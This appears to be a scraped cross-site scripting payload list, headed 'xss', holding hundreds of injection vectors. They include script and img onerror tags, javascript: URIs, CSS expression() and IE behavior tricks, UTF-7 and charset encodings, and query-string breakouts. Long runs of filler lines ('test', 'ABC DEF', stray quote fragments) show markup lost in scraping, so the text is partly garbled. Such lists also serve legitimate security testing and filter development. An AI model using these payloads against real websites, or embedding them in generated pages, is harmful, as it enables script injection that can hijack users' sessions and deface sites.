diansuimo2268
diansuimo2268

xss

javascript:alert(1);
javascript:alert(2);
javascript:alert(3);
javascript:alert(4);
javascript:alert(5);
javascript:alert(6);
javascript:alert(7);
'`"><\x3Cscript>javascript:alert(8)
'`"><\x00script>javascript:alert(9)

































































\x3Cscript>javascript:alert(75)
'"`>


--> -->
-->
-->
-->
`"'>


test
test
test
test
test
test
test
test
test
test
test
test
test
test







"'`>ABC
DEF
"'`>ABC
DEF



'`"><\x3Cscript>javascript:alert(115)
'`"><\x00script>javascript:alert(116)
"'`><\x3Cimg src=xxx:x οnerrοr=javascript:alert(117)>
"'`><\x00img src=xxx:x οnerrοr=javascript:alert(118)>




javascript:alert(123);
javascript:alert(124);
javascript:alert(125);
javascript:alert(126);
javascript:alert(127);
javascript:alert(128);
javascript:alert(129);
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
javascript:alert(270)
javascript:alert(271)
javascript:alert(272)
javascript:alert(273)
javascript:alert(274)
javascript:alert(275)
javascript:alert(276)
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>


alert(308)0





">
">
">
">

<% foo>



































XXX


<br><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x οnerrοr=javascript:alert(361)></a>"><br><!--[if]><script>javascript:alert(362)</script --><br><!--[if<img src=x οnerrοr=javascript:alert(363)//]> --><br><object id="x" classid="clsid:CB927D3662-4FF7-4a9e-A36669-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C3667-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(366)" style="behavior:url(#x);"><param name=postdomevents /></object><br><a style="-o-link:'javascript:javascript:alert(367)';-o-link-source:current">X<br><style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(368)'}{}*{-o-link-source:current}]{color:red};</style><br><link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(369))%7d<br><style>@import "data:,*%7bx:expression(javascript:alert(370))%7D";</style><br><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" οnclick="javascript:alert(371);">XXX</a></a><a href="javascript:javascript:alert(371)">XXX</a><br><// style=x:expression\28javascript:alert(375)\29><br><style>*{x:expression(javascript:alert(376))}</style><br><div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(378));">X<br><script>({set/**/$($){_/**/setter=$,_=javascript:alert(384)}}).$=eval</script><br><script>({0:#0=eval/#0#/#0#(javascript:alert(385))})</script><br><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(386)}),x</script><br><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(387)')()</script><br><meta charset="mac-farsi">¼script¾javascript:alert(390)¼/script¾<br>X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(391)` ><br>392<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh䎒vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"οnerrοr=javascript:alert(392)>`><br>393<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."οnerrοr=javascript:alert(393)>><br>395<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(395) strokecolor=white strokeweight=395000px from=0 to=395000 /></a><br><a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(396)">XXX</a><br><event-source src="%(event)s" οnlοad="javascript:alert(399)"><br><a href="javascript:javascript:alert(400)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"><br><div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img񡿹src=x:x񡿹onerror񡿹=javascript:alert(401)>"><br><script>javascript:alert(405)</script><br><IMG SRC="javascript:javascript:alert(406);"><br><IMG SRC=javascript:javascript:alert(407)><br><IMG SRC=`javascript:javascript:alert(408)`><br><FRAMESET><FRAME SRC="javascript:javascript:alert(410);"></FRAMESET><br><BODY ONLOAD=javascript:alert(411)><br><BODY ONLOAD=javascript:javascript:alert(412)><br><IMG SRC="jav ascript:javascript:alert(413);"><br><BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(414)><br><IMG SRC="javascript:javascript:alert(417)"<br><INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(419);"><br><IMG DYNSRC="javascript:javascript:alert(420)"><br><IMG LOWSRC="javascript:javascript:alert(421)"><br><BGSOUND SRC="javascript:javascript:alert(422);"><br><BR SIZE="&{javascript:alert(423)}"><br><LINK REL="stylesheet" HREF="javascript:javascript:alert(425);"><br><STYLE>li {list-style-image: url("javascript:javascript:alert(429)");}</STYLE><UL><LI>XSS<br><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(430);"><br><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(431);"><br><IFRAME SRC="javascript:javascript:alert(432);"></IFRAME><br><TABLE BACKGROUND="javascript:javascript:alert(433)"><br><TABLE><TD BACKGROUND="javascript:javascript:alert(434)"><br><DIV STYLE="background-image: url(javascript:javascript:alert(435))"><br><DIV STYLE="width:expression(javascript:alert(436));"><br><IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(437))"><br><XSS STYLE="xss:expression(javascript:alert(438))"><br><STYLE TYPE="text/javascript">javascript:alert(439);</STYLE><br><STYLE>.XSS{background-image:url("javascript:javascript:alert(440)");}</STYLE><A class="XSS"></A><br><STYLE type="text/css">BODY{background:url("javascript:javascript:alert(441)")}</STYLE><br><!--[if gte IE 4]><SCRIPT>javascript:alert(442);</SCRIPT><![endif]--><br><BASE HREF="javascript:javascript:alert(443);//"><br><OBJECT classid=clsid:ae24fdae-03c6-445445d445-8b76-0080c744f389><param name=url value=javascript:javascript:alert(445)></OBJECT><br><HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(446)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN><br><HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(447)</SCRIPT>"></BODY></HTML><br><form id="test" /><button form="test" formaction="javascript:javascript:alert(450)">X<br><body οnscrοll=javascript:alert(451)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus><br><P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(452)"><br><STYLE>a{background:url('s454' 's2)}@import javascript:javascript:alert(454);');}</STYLE><br><meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(455)&&;&&<&&/script&&><br><SCRIPT onreadystatechange=javascript:javascript:alert(456);></SCRIPT><br><style onreadystatechange=javascript:javascript:alert(457);></style><br><?xml version="458.0"?><html:html xmlns:html='http://www.w3.org/458999/xhtml'><html:script>javascript:alert(458);</html:script></html:html><br><embed code=javascript:javascript:alert(460);></embed><br><frameset οnlοad=javascript:javascript:alert(462)></frameset><br><object οnerrοr=javascript:javascript:alert(463)><br><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(465);">]]</C><X></xml><br><IMG SRC=&{javascript:alert(466);};><br><a href="javAascript:javascript:alert(467)">test467</a><br><a href="javaascript:javascript:alert(468)">test468</a><br><iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;οnerrοr=javascript:alert(470)&gt;>"><br>';alert(471))//';alert(471))//";<br>alert(472))//";alert(472))//--<br>></SCRIPT>">'><SCRIPT>alert(473))</SCRIPT><br><IMG SRC="javascript:alert(476);"><br><IMG SRC=javascript:alert(477)><br><IMG SRC=JaVaScRiPt:alert(478)><br><IMG SRC=javascript:alert(479)><br><IMG SRC=`javascript:alert(480)`><br><a οnmοuseοver="alert(481)">xxs link</a><br><a οnmοuseοver=alert(482)>xxs link</a><br><IMG """><SCRIPT>alert(483)</SCRIPT>"><br><IMG SRC=javascript:alert(484))><br><IMG SRC=# οnmοuseοver="alert(485)"><br><IMG SRC= οnmοuseοver="alert(486)"><br><IMG οnmοuseοver="alert(487)"><br><IMG SRC="jav ascript:alert(491);"><br><IMG SRC="jav ascript:alert(492);"><br><IMG SRC="jav ascript:alert(493);"><br><IMG SRC="jav ascript:alert(494);"><br>perl -e 'print "<IMG SRC=java\0script:alert(495)>";' > out<br><IMG SRC="  javascript:alert(496);"><br><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(498)><br><<SCRIPT>alert(500);//<</SCRIPT><br><IMG SRC="javascript:alert(503)"<br>\";alert(505);//<br>




  • XSS








    exp/*





    ¼script¾alert(531)¼/script¾











    alert(549)'); ?>

    +ADw-SCRIPT+AD4-alert(553);+ADw-/SCRIPT+AD4-

    <
    <"';alert(806))//\';alert(806))//";alert(806))//\";alert(806))//-->">'>
    ';alert(807))//\';alert(807))//";alert(807))//\";alert(807))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
    &search=1
    0&q=';alert(810))//\';alert%2?8810))//";alert(String.fromCharCode?(88,83,83))//\";alert(810)%?29//-->">'>&submit-frmGoogleWeb=Web+Search







    ...